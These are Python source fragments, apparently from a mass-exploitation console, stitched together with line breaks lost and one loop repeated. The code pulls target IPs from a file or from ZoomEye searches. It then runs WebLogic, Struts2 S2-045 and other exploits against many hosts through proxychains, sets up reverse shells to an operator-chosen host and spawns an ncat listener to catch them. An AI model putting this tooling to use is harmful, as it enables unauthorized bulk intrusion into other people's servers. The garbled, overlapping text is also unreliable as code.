def main(): ''' manage procedure ''' answ = str( input(colors.CYAN + '[?] Use ip_list.txt as target list? [y/n] ' + colors.END)).strip() if answ.lower() == 'n': os.system("ls data") SessionParameters.IP_LIST = console.input_check( '[=] Choose your target IP list, eg. ip_list.txt ', allow_blank=False) while True: try: cmd = input(colors.CYAN + colors.BOLD + colors.UNDERLINE + "\nmec" + colors.END + colors.CYAN + colors.BOLD + " > " + colors.END) try: execute(cmd) except (KeyboardInterrupt, EOFError, SystemExit): sys.exit(0) except KeyboardInterrupt: try: answ = input("\n[?] Are you sure to exit? [y/n] ") except KeyboardInterrupt: print("\n[-] Okay okay, exiting immediately...") check_kill_process('ss-proxy') sys.exit(0) if answ.lower() == 'y': check_kill_process('ss-proxy') sys.exit(0) else: continue
def api_test(): ''' get verified with zoomeye ''' amnt = int( console.input_check( "[*] How many results do you want? (10 IPs on each page) ", check_type=int).strip()) threads = [] api = ZoomEyeAPI('zoomeye.conf') try: print(colors.BLUE + '[*] Crawling fetched pages from ZoomEye...' + colors.END) access_token = api.login() headers = { 'Authorization': 'JWT ' + access_token, } except TypeError: console.print_error('[-] Invalid access token') return status = threading.Thread(target=progress, args=(ZoomEyeAPI.OUTFILE, )) status.setDaemon(True) status.start() limit = 0 for page in range(1, int(amnt / 10)): thd = threading.Thread(target=crawler, args=( ZoomEyeAPI.QRY, amnt, page, headers, )) threads.append(thd) for job in threads: job.setDaemon(True) job.start() if limit == 0 or limit == 10: limit = 0 job.join() limit += 1
job.setDaemon(True) job.start() if limit == 0 or limit == 10: limit = 0 job.join() limit += 1 def main(): ''' put things together ''' try: api_test() print('\n') except BaseException: pass if __name__ == '__main__': try: ZoomEyeAPI.QRY = console.input_check("[*] Your query is: ", allow_blank=False) ZoomEyeAPI.OUTFILE = './data/zoomeye-{}.txt'.format('-'.join( ZoomEyeAPI.QRY.replace(':', '_').split())) main() except (EOFError, KeyboardInterrupt, SystemExit): print('\n[*] Exiting...') else: debug_traceback()
def attack(): ''' handles attack command ''' if input_check('[?] Do you wish to use proxychains? [y/n] ', choices=['y', 'n']) == 'y': SessionParameters.USE_PROXY = True else: SessionParameters.USE_PROXY = False answ = input_check('\n[?] Do you wish to use\ \n\n [a] built-in exploits\ \n [m] or launch your own manually?\ \n\n[=] Your choice: ', choices=['a', 'm']) if answ == 'a': print(colors.CYAN + colors.BOLD + '\n[?] Choose a module from: ' + colors.END + '\n') print(console.BUILT_IN) answ = input_check('[=] Your choice: ', check_type=int, choices=['0', '1', '2', '3', '4']) try: if answ == '2': console.print_error("\n[-] Under development") elif answ == '1': console.print_error('\n[-] Under development') elif answ == '0': scanner(ExecExp.weblogic()) elif answ == '3': scanner(ExecExp.s2_045()) elif answ == '4': scanner(ExecExp.witbe()) except BaseException: console.print_error("[-] We have an error executing exploit") debug_except() elif answ == 'm': print(colors.CYAN + colors.UNDERLINE + colors.BOLD + "\nWelcome, in here you can choose your own exploit\n" + colors.END) print(colors.CYAN + '[*] Here are available exploits:\n' + colors.END) list_exp() exploit = input( "\n[*] Enter the path (eg. joomla/rce.py) of your exploit: " ).strip() jobs = int( input_check("[?] How many processes each time? ", check_type=int)) custom_args = [] answ = input_check("[?] Do you need a reverse shell [y/n]? ", choices=['y', 'n']) if answ == 'y': lhost = input("[*] Where do you want me to send shells? ").strip() lport = input_check( "[*] and at what port? (make sure you have access to that port) ", check_type=int) custom_args = ['-l', lhost, '-p', lport] answ = input_check( '[*] Do you need me to start a listener? [y/n] ', choices=['y', 'n']) if answ == 'y': print("\n[*] Spawning ncat listener in new window...\n") try: subprocess.Popen(args=[ "gnome-terminal", "--command=ncat -nklvp " + lport + " -m 1000" ], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE) except BaseException: print( colors.YELLOW + "[-] Could not launch our listener, do you have GNOME-Terminal installed?" + colors.END + '\n') else: print( "[*] Okay, just make sure you receive the reverse shells\n" ) else: pass custom_args += input( "[*] args for this exploit (target IP is handled already) ").strip( ).split() exec_path = exploit.split('/')[1:] work_path = exploit.split('/')[:-1] delimtr = '/' exec_path = delimtr.join(exec_path) work_path = delimtr.join(work_path) delimtr = ' ' print( colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END, 'proxychains4 -q -f proxy.conf {} -t <target ip>'.format( exec_path), delimtr.join(custom_args)) scanner_args = (exploit, work_path, exec_path, custom_args, jobs) scanner(scanner_args) else: console.print_error('[-] Invalid input')